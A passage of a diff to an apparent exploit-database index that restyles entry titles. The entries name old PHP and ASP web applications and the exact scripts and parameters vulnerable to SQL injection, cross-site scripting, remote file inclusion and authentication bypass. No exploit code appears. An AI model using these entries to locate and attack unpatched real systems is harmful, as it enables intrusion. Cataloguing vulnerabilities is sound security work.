Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 -27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - CFG[popphoto_base_path] Parameter Remote File Inclusion",2006-05-15,VietMafia,php,webapps,0 +27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - 'CFG[popphoto_base_path]' Remote File Inclusion",2006-05-15,VietMafia,php,webapps,0 27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction - 'item.php?id' SQL Injection",2006-05-15,Luny,php,webapps,0 27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction - 'email_request.php?user_id' Cross-Site Scripting",2006-05-15,Luny,php,webapps,0 27871,platforms/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,php,webapps,0 @@ -30147,8 +30148,8 @@ id,file,description,date,author,platform,type,port 27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 - 'ODP.php' Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0 27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 - HTML Injection",2005-05-15,X-BOY,php,webapps,0 27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 - 'index.php' Cross-Site Scripting",2006-05-15,LoK-Crew,php,webapps,0 -27885,platforms/php/webapps/27885.txt,"PHPRemoteView - PRV.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 -27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - search.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 +27885,platforms/php/webapps/27885.txt,"PHPRemoteView - 'PRV.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 +27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0 27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0 @@ -30169,10 +30170,10 @@ id,file,description,date,author,platform,type,port 27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,php,webapps,0 27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 - 'tiki-lastchanges.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-29,Blwood,php,webapps,0 -27918,platforms/asp/webapps/27918.txt,"ASPBB 0.5.2 - Perform_search.asp Cross-Site Scripting",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 +27918,platforms/asp/webapps/27918.txt,"ASPBB 0.5.2 - 'Perform_search.asp' Cross-Site Scripting",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 27919,platforms/php/webapps/27919.txt,"Geeklog 1.4 - Multiple Input Validation Vulnerabilities",2006-05-11,trueend5,php,webapps,0 -27920,platforms/php/webapps/27920.txt,"EVA-Web 2.1.2 - article-album.php3 debut_image Parameter Cross-Site Scripting",2006-05-30,r0t,php,webapps,0 -27921,platforms/php/webapps/27921.txt,"EVA-Web 2.1.2 - rubrique.php3 date Parameter Cross-Site Scripting",2006-05-30,r0t,php,webapps,0 +27920,platforms/php/webapps/27920.txt,"EVA-Web 2.1.2 - 'article-album.php3?debut_image' Cross-Site Scripting",2006-05-30,r0t,php,webapps,0 +27921,platforms/php/webapps/27921.txt,"EVA-Web 2.1.2 - 'rubrique.php3?date' Cross-Site Scripting",2006-05-30,r0t,php,webapps,0 27922,platforms/php/webapps/27922.txt,"EVA-Web 2.1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-30,r0t,php,webapps,0 27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 - 'index.php' Cross-Site Scripting",2006-05-31,Jokubas,php,webapps,0 27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,php,webapps,0 @@ -30201,7 +30202,7 @@ id,file,description,date,author,platform,type,port 27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - 'options.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 -27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0 +27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - 'Viewmsg.asp' SQL Injection",2006-06-02,ajann,asp,webapps,0 27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - 'template.php' Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 @@ -30213,7 +30214,7 @@ id,file,description,date,author,platform,type,port 27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 - 'galimage.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 27989,platforms/php/webapps/27989.txt,"MiraksGalerie 2.62 - 'galsecurity.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 27998,platforms/php/webapps/27998.txt,"Open Business Management 1.0.3 pl1 - 'company_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps,0 -27999,platforms/php/webapps/27999.txt,"Baby Katie Media VSReal and VScal 1.0 - 'index.php' lid Parameter Cross-Site Scripting",2006-06-09,Luny,php,webapps,0 +27999,platforms/php/webapps/27999.txt,"Baby Katie Media VSReal and VScal 1.0 - 'index.php?lid' Cross-Site Scripting",2006-06-09,Luny,php,webapps,0 28000,platforms/php/webapps/28000.txt,"Baby Katie Media VSReal and VScal 1.0 - 'myslideshow.php?title' Cross-Site Scripting",2006-06-09,Luny,php,webapps,0 28002,platforms/asp/webapps/28002.txt,"KAPhotoservice 7.5 - 'album.asp?cat' Cross-Site Scripting",2006-06-09,r0t,asp,webapps,0 28003,platforms/asp/webapps/28003.txt,"KAPhotoservice 7.5 - 'albums.asp?albumid' Cross-Site Scripting",2006-06-09,r0t,asp,webapps,0 @@ -30231,7 +30232,7 @@ id,file,description,date,author,platform,type,port 28017,platforms/php/webapps/28017.txt,"CEScripts (Multiple Scripts) - Cross-Site Scripting",2006-06-13,Luny,php,webapps,0 28018,platforms/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injections",2006-06-13,"CrAzY CrAcKeR",php,webapps,0 28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 -28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php' imgdir Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 +28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php?imgdir' Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 - 'FTP_index.php' Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0 @@ -30258,7 +30259,7 @@ id,file,description,date,author,platform,type,port 28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - 'search.php' Cross-Site Scripting",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 - 'index.php' Cross-Site Scripting",2006-03-06,alijsb,php,webapps,0 28066,platforms/php/webapps/28066.txt,"Singapore 0.9.x/0.10 - Multiple Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 -28067,platforms/php/webapps/28067.txt,"Singapore 0.9.x/0.10 - 'index.php' template Parameter Cross-Site Scripting",2006-06-19,simo64,php,webapps,0 +28067,platforms/php/webapps/28067.txt,"Singapore 0.9.x/0.10 - 'index.php?template' Cross-Site Scripting",2006-06-19,simo64,php,webapps,0 28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - '/mail/index.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - '/mail/reply.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28070,platforms/php/webapps/28070.txt,"V3 Chat Instant Messenger - 'online.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 @@ -30266,10 +30267,10 @@ id,file,description,date,author,platform,type,port 28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger - 'profile.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - 'profileview.php?membername' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - 'expire.php?cust_name' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 +28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - 'mycontacts.php' membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 28076,platforms/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - 'member.php' Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 - 'Subject' HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 -28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 +28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - 'Error_msg' Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 28088,platforms/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection",2006-06-22,Silitix,php,webapps,0 28089,platforms/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'newthread.php?boardid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'report.php?postid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 @@ -30313,28 +30314,28 @@ id,file,description,date,author,platform,type,port 28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 -28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php' PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 +28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - 'top.php' Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0 28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,php,webapps,0 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0 -28147,platforms/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php' _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28147,platforms/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28148,platforms/php/webapps/28148.txt,"Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28149,platforms/php/webapps/28149.txt,"Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28150,platforms/php/webapps/28150.txt,"free QBoard 1.1 - 'index.php' qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28150,platforms/php/webapps/28150.txt,"free QBoard 1.1 - 'index.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28151,platforms/php/webapps/28151.txt,"free QBoard 1.1 - 'about.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28152,platforms/php/webapps/28152.txt,"free QBoard 1.1 - 'contact.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28153,platforms/php/webapps/28153.txt,"free QBoard 1.1 - 'delete.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28154,platforms/php/webapps/28154.txt,"free QBoard 1.1 - 'faq.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28155,platforms/php/webapps/28155.txt,"free QBoard 1.1 - 'features.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28156,platforms/php/webapps/28156.txt,"free QBoard 1.1 - 'history.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 - Password Parameter SQL Injection",2006-07-03,supermalhacao,php,webapps,0 +28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 - 'Password' SQL Injection",2006-07-03,supermalhacao,php,webapps,0 28158,platforms/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps,0 28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Inclusion",2006-07-03,"CrAzY CrAcKeR",php,webapps,0 28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0 28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 - 'index.php' Remote File Inclusion",2006-07-04,black-code,php,webapps,0 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 -28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php' Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0 +28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php?Date' SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0 28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injections",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps,0 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0 @@ -30343,24 +30344,24 @@ id,file,description,date,author,platform,type,port 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0 28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-06,"Security News",php,webapps,0 28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - '/documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - '/users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php?forgot' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - '/users/browse.php?cat' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - '/admin/fix_content.php?submit' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php?cat_id' SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 -28193,platforms/asp/webapps/28193.txt,"Webvizyon - SayfalaAltList.asp SQL Injection",2006-07-08,StorMBoY,asp,webapps,0 +28193,platforms/asp/webapps/28193.txt,"Webvizyon - 'SayfalaAltList.asp' SQL Injection",2006-07-08,StorMBoY,asp,webapps,0 28195,platforms/php/webapps/28195.txt,"RW::Download - 'stats.php' Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0 28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - 'Tiny_mce_gzip.php' Directory Traversal",2006-07-10,armin390,php,webapps,0 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - 'Topics.php' SQL Injection",2006-07-10,Paisterist,php,webapps,0 -28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x - error.asp Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps,0 +28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x - 'error.asp' Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps,0 28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 - 'add.php' SQL Injection",2006-07-11,C.B.B.L,php,webapps,0 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 -28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 -28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 +28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - 'Guestbook.php' HTML Injection",2006-07-11,omnipresent,php,webapps,0 +28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - 'AIndex.asp' Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - 'codes-english.php?show' Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - 'picture.php?img' Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 - 'PhotoCycle.php' Cross-Site Scripting",2006-07-13,Luny,php,webapps,0 @@ -30370,7 +30371,7 @@ id,file,description,date,author,platform,type,port 28219,platforms/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusions",2006-07-17,"Tan Chew Keong",php,webapps,0 -28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 +28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - 'LM_Path' Remote File Inclusion",2006-07-17,xoron,php,webapps,0 28233,platforms/php/webapps/28233.txt,"Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0 28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps,0 @@ -30378,8 +30379,8 @@ id,file,description,date,author,platform,type,port 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 -28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28250,platforms/php/webapps/28250.txt,"Geodesic Solutions (Multiple Products) - 'index.php b' SQL Injection",2006-07-20,LBDT,php,webapps,0 +28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php?d' SQL Injection",2006-07-20,LBDT,php,webapps,0 +28250,platforms/php/webapps/28250.txt,"Geodesic Solutions (Multiple Products) - 'index.php?b' SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0 @@ -30421,10 +30422,10 @@ id,file,description,date,author,platform,type,port 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php?subdir' Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 -28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - 'Quick_Path' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0 +28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - 'GB_PATH' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - 'preview_email.cgi?file' Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0 28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - 'error.php' Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0 28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - 'UpdatePF.php' Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0 28324,platforms/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 @@ -30432,19 +30433,19 @@ id,file,description,date,author,platform,type,port 28327,platforms/php/webapps/28327.txt,"VWar 1.x - 'war.php' Multiple SQL Injections",2006-08-03,mfoxhacker,php,webapps,0 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 -28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 +28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - 'Password' SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 28340,platforms/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",multiple,webapps,0 -28342,platforms/php/webapps/28342.txt,"vBulletin 3.0.14 - global.php Encoded URL Cross-Site Scripting",2006-08-05,imei,php,webapps,0 +28342,platforms/php/webapps/28342.txt,"vBulletin 3.0.14 - 'global.php' Encoded URL Cross-Site Scripting",2006-08-05,imei,php,webapps,0 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0 28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - 'profile.php' Multiple SQL Injections",2006-08-07,"Chris Boulton",php,webapps,0 28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusions",2006-08-07,Matdhule,php,webapps,0 -28350,platforms/php/webapps/28350.txt,"VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28351,platforms/php/webapps/28351.txt,"VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28352,platforms/php/webapps/28352.txt,"VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28353,platforms/php/webapps/28353.txt,"VWar 1.5 - 'challenge.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28354,platforms/php/webapps/28354.txt,"VWar 1.5 - 'joinus.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28355,platforms/php/webapps/28355.txt,"VWar 1.5 - 'news.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 -28356,platforms/php/webapps/28356.txt,"VWar 1.5 - 'stats.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28350,platforms/php/webapps/28350.txt,"VWar 1.5 - 'war.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28351,platforms/php/webapps/28351.txt,"VWar 1.5 - 'member.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28352,platforms/php/webapps/28352.txt,"VWar 1.5 - 'calendar.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28353,platforms/php/webapps/28353.txt,"VWar 1.5 - 'challenge.php?vwar_root' 